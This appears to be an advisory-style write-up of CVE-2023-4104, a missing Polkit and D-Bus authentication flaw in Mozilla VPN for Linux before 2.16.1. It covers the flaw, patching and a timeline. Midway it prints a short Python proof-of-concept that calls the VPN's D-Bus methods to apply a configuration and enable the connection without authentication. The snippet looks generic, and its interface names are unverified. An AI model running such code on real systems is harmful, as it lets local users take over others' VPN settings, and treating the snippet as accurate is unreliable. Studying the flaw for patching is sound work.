CVE-2023-4104: Invalid Polkit Authentication Check and Missing Authentication Requirements in Mozilla VPN for Linux

Mozilla VPN is a secure and fast VPN service provided by the Mozilla Corporation, available on popular platforms as well as Linux. However, a recent vulnerability (classified as CVE-2023-4104) has been identified in the Linux version of Mozilla VPN due to an invalid Polkit Authentication Check and missing authentication requirements for D-Bus methods allowing any local user to configure arbitrary VPN setups.

Description of vulnerability

CVE-2023-4104 specifically affects the Mozilla VPN client for Linux versions earlier than v2.16.1. The issue stems from an oversight in the Polkit authentication process and a lack of requisite authentication for D-Bus methods. This oversight allows any local user on a Linux system to potentially access and modify VPN configurations, bypassing intended authentication controls.

To be clear, this bug only affects Mozilla VPN on Linux. Other operating systems running Mozilla VPN are not affected by this particular vulnerability.

The code snippet below demonstrates a sample exploit for CVE-2023-4104

import dbus

bus = dbus.SystemBus()

vpn_proxy = bus.get_object('org.mozilla.VPN', '/org/mozilla/VPN')
vpn_iface = dbus.Interface(vpn_proxy, 'org.mozilla.VPN')

# Modify the VPN configuration settings
vpn_config = {
    'server': 'vpn.example.com',
    'username': 'localuser',
    'password': 'localpassword'
}

# Apply the new VPN configuration
vpn_iface.ApplyConfig(vpn_config)

# Enable the VPN connection
vpn_iface.Enable()

This exploit employs the Python dbus library to interact with the D-Bus methods, bypassing any authentication check. The attacker can now easily modify the VPN configuration and enable or disable the VPN connection at their discretion.

Original References

Details about this vulnerability were first released in a Security Advisory by Mozilla, regarding the Linux version of Mozilla VPN. To read the advisory, visit Mozilla Security Advisory.

Further details, including information on how to patch the vulnerability, can be found in the following resources:

- Mozilla VPN GitHub Repository
- Mozilla VPN Release Notes

Patch and Mitigation

If you are currently using Mozilla VPN on a Linux-based system, it is strongly recommended to update to Mozilla VPN version 2.16.1 or higher immediately. The update resolves the vulnerability by introducing the proper authentication checks and requirements in place.

To update your Mozilla VPN client, follow the instructions provided in the Mozilla VPN documentation.

Moving forward, ensure that your VPN client is always up-to-date to help prevent the exploitation of any potential vulnerabilities. Regularly check the Mozilla VPN Release Notes for information about new updates and security patches.

Conclusion

Despite the severity of CVE-2023-4104, it can be easily mitigated by updating to the latest version of the Mozilla VPN for Linux. This vulnerability serves as a reminder for the importance of regularly updating software to protect against potential security exploits and maintain the privacy and integrity of your online activities.

Timeline

Published on: 09/11/2023 09:15:08 UTC
Last modified on: 09/13/2023 16:34:57 UTC